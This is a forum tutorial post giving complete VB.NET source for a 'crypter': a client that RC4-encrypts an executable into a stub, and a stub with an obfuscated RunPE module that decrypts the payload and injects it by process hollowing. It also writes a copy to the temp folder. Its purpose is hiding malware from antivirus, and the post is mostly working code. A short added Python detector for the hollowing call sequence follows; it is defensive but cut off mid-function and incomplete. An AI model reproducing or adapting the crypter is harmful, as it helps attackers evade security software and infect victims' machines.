[es][tuto]crypter runtime vb.net by queda

Post by Queda de Faraó, Tue Mar 13, 2012 1:50 pm

Hi everyone, this tutorial will show how to make a crypter with RunPE and a splash effect in VB 2008; it is dedicated to the coders of oversec.
First you need to create two forms, one for the client and another for the splash:
Form1--client
Form2--Splash
Let's get to work and build the client: first create a text box and two buttons.
Once that is done, add the following at the top of the code:
[PHP]Imports System.Text[/PHP]
[PHP]Const Jod_Separador = "@_Jod_@"[/PHP]
Add the OpenFileDialog component.
In the click event of button 1, add the following code:
[PHP]'----------------Opening the file to be encrypted------------
OpenFileDialog1.FileName = ""
OpenFileDialog1.Filter = "Exe(*.exe)|*.exe"
OpenFileDialog1.ShowDialog()
TextFile.Text = OpenFileDialog1.FileName[/PHP]
In the click event of button 2, we will add two variable declarations:
[PHP] '--------------Variable declarations---------------------
Dim Jod_Aberturabin As String
Dim Jod_Modulo_Princi As String
Dim Jod_Separador As String = "@_Jod_@"
Dim Jod_nomeArq As String[/PHP]
In the click event of button 2, add the following code:
[PHP] '----------------File protection---------------------
If Jod_salvar.ShowDialog = Windows.Forms.DialogResult.OK Then
Jod_nomeArq = Jod_salvar.FileName
Else : Exit Sub
End If
Jod_salvar.Filter = "Executáveis (*.exe)|*.exe"
'-----------------------------------------------------------[/PHP]
Still in button 2, we will open the binary files:
[PHP]FileOpen(1, TextFile.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
Jod_Aberturabin = Space(LOF(1))
FileGet(1, Jod_Aberturabin)
FileClose(1)
'-------------------------------------------------------------
FileOpen(1, Application.StartupPath & "\stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
Jod_Modulo_Princi = Space(LOF(1))
FileGet(1, Jod_Modulo_Princi)
FileClose(1)
'------------------------------------------------------------
FileOpen(1, Jod_nomeArq, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, Jod_Modulo_Princi & Jod_Separador & rc4(Jod_Aberturabin, "Jodkeyencript"))
FileClose(1)[/PHP]
Then add the RC4 encryption module that was chosen:
[PHP]Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
Dim i As Integer = 0 'copy from here
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty
Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}
Dim intLength As Integer = password.Length
Dim a As Integer = 0
While a <= 255
Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While
Dim x As Integer = 0
Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
End While
a = 1
While a <= message.Length
Dim itmp As Integer = 0
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp
Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
itmp = Asc(ctmp)
Dim cipherby As Integer = itmp Xor k
cipher.Append(Chr(cipherby))
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While
returnCipher = cipher.ToString
cipher.Length = 0
Return returnCipher
End Function
[/PHP]
That completes the structure of the client; now let's make the splash:
oversec.org/showthread.php?1107-ES-Creating-a-splash-scren-in-effect
Now we move on to developing the stub: create a new project and, in the form, add the following code:

[PHP]
Me.Visible = False
Me.Hide()
'---------Separador-----------------
Dim Jod_Form_seperador As String = "@_Jod_@"
Dim Jod_Capt_Prc As String
Jod_Capt_Prc = Process.GetCurrentProcess().MainModule.FileName
Dim Jod_Ptc As String = System.IO.Path.GetTempPath
Dim Jod_Arq_Leitor, Jod_Pega_Geral(), Jod_Para_cry As String
'------------------------------------
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
Jod_Arq_Leitor = Space(LOF(1))
FileGet(1, Jod_Arq_Leitor)
FileClose(1)
'--------------------------------------

Jod_Pega_Geral = Split(Jod_Arq_Leitor, Jod_Form_seperador)
Jod_Para_cry = iRvFqeDEfJ(Jod_Pega_Geral(1), "Jodkeyencript")
Dim Jod_Convert_Bytes() As Byte
Jod_Convert_Bytes = Encoding.Default.GetBytes(Jod_Para_cry)
Try
S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0.Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(Jod_Convert_Bytes, Jod_Capt_Prc)
Catch ex As Exception

End Try

FileOpen(5, Jod_Ptc & "\Jodhsghgsjhks.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(5, Jod_Para_cry)
FileClose(5)

Me.Close()[/PHP]
Now create a new module, RunPE:
[PHP]Imports System.ComponentModel
Imports System.Runtime.InteropServices
Public Class S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0
Public Const SDnNle9g5VF2VbJGGZlWNjH8OJ9Wcjyw9HYEPDliWtCnf9 As Long = &H200
Public Const SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt As Long = &H40
Public Const S7MFd3CpqpMqb2C0vP4pbzNH0tPv9tgbwrgJwOm8ymYHSn As Long = &H80
Public Const S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A As Long = &H20
Public Const SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM As Long = &H10
Public Const SJf1ylUN6liDLXTU4ZfL3A2X53qOFXCvSGJCxTKR9t33GL As Long = &H8
Public Const Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So As Long = &H1
Public Const SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb As Long = &H4
Public Const SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC As UInt32 = &H2
Shared Sub Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(ByVal SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq() As Byte, ByVal ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg As String)
Dim SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF As S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6
Dim SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY = GCHandle.Alloc(SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, GCHandleType.Pinned)
Dim SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F As Integer = SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject.ToInt32
Dim SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k
SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT = Marshal.PtrToStructure(SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject, SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.GetType)
SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.Free()
If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.CreateProcess(Nothing, ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh, False, 4, Nothing, Nothing, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC) = 0 Then Return
Dim SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh
SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address), SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.GetType)
Dim S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B As Long, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7 As UInteger
SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU.CB = Len(SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU)
SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Flags = 65538
If SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Signature <> 17744 Or SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Magic <> 23117 Then Return
If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.GetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ReadProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, 4, 0) >= 0 And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ZwUnmapViewOfSection(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) >= 0 Then
Dim ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW As UInt32 = S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualAllocEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Image, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SImage, 12288, 4)
If ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW <> 0 Then
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW, SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SHeaders, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B = SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address + 248
For SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 As Integer = 0 To SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.File.Sections - 1
S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B + SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 * 40), S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.GetType)
Dim Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size) As Byte
For S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt As Integer = 0 To S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size - 1 : Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) = SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Pointer + S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) : Next
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualProtectEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Misc.Size, SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Flags), S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au)
Next SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1
Dim Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv = BitConverter.GetBytes(ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv, 4, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Eax = ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Address
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ResumeThread(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread)
End If
End If
End Sub
Private Shared Function Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(ByVal Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH As Long, ByVal SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F As Long) As Long
Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6 = S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH) / (2 ^ SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F)
End Function
Private Shared Function S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(ByVal S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t As Long) As Double
Const SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc = 4294967296.0#
If S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t < 0 Then
S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t + SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc
Else : S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t
End If
End Function
Private Shared Function SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(ByVal SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ As Long) As Long
Dim SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w() As Object = {Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So, SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM, SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC, _
S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A, SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt, _
SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt}
SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh = SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w(Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ, 29))
End Function
<EditorBrowsable(1)> Friend Class S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ
<StructLayout(0)> Structure Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
<StructLayout(0)> Structure SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N
Dim Address, Size As UInt32
End Structure
Structure SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp
Dim Name As Byte, Misc As SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
Structure Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU
Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
<StructLayout(0)> Structure SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
<StructLayout(0)> Structure S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
Structure Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh
Dim Signature As UInt32, File As Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw, [Optional] As SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q
End Structure
<StructLayout(0)> Structure Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
<StructLayout(0)> Structure SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q
Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7()
End Structure
<StructLayout(0)> Structure SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7
Dim Address, Size As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal Jodgsgusname As String, ByVal Jodhjgsjhgsjcommand As String, ByRef process As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByRef thread As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, <Out()> ByRef info As Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVCal Jodsgfsfprocess As IntPtr, ByVal Jodhmjhxkhaddress As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean
End Class
End Class[/PHP]
Well, that concludes the crypter.

Queda de Faraó
Moderator

Posts: 11
Join date: 13/03/2012
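
Seen from the detection side, the stub in this post starts a suspended copy of its own executable (CreateProcess with flags 4) and then calls ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread against it. The following is an added example, not part of the original post: Python that flags that ordered sequence in API-call telemetry; the event schema, process names and PIDs are constructed for illustration.

```python
import json

# Cross-process calls the stub's RunPE module makes against its child, in order.
HOLLOW_STEPS = ("ZwUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
                "SetThreadContext", "ResumeThread")
CREATE_SUSPENDED = 0x4  # the flags value the stub passes to CreateProcess

# Constructed telemetry, one JSON event per line; the field names are a hypothetical schema.
SAMPLE_LOG = """
{"pid": 900, "image": "launcher.exe", "api": "CreateProcess", "child_pid": 950, "child_image": "updater.exe", "flags": 4}
{"pid": 900, "image": "launcher.exe", "api": "ResumeThread", "target_pid": 950}
{"pid": 4120, "image": "packed.exe", "api": "CreateProcess", "child_pid": 4188, "child_image": "packed.exe", "flags": 4}
{"pid": 4120, "image": "packed.exe", "api": "ZwUnmapViewOfSection", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "VirtualAllocEx", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "WriteProcessMemory", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "WriteProcessMemory", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "VirtualProtectEx", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "WriteProcessMemory", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "SetThreadContext", "target_pid": 4188}
{"pid": 4120, "image": "packed.exe", "api": "ResumeThread", "target_pid": 4188}
"""

def parse_log(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def find_hollowing(events):
    """Report children that were created suspended and then unmapped, rewritten,
    re-pointed and resumed by their own parent."""
    tracked = {}   # child pid -> progress for children created suspended
    findings = []
    for ev in events:
        if ev["api"] == "CreateProcess":
            if ev["flags"] & CREATE_SUSPENDED:
                tracked[ev["child_pid"]] = {
                    "parent": ev["pid"], "step": 0, "writes": 0,
                    # The stub relaunches its own executable as the host process.
                    "self_spawn": ev["image"].lower() == ev["child_image"].lower()}
            continue
        target = ev.get("target_pid")
        state = tracked.get(target)
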